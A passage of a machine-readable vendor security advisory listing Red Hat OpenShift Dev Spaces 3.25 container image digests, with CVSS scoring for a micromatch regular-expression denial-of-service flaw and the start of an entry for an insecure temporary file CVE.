"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "micromatch: vulnerable to Regular Expression Denial of Service"
},
{
"cve": "CVE-2025-55247",
"cwe": {
"id": "CWE-377",
"name": "Insecure Temporary File"
},
"discovery_date": "2025-10-10T13:25:49.702000+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
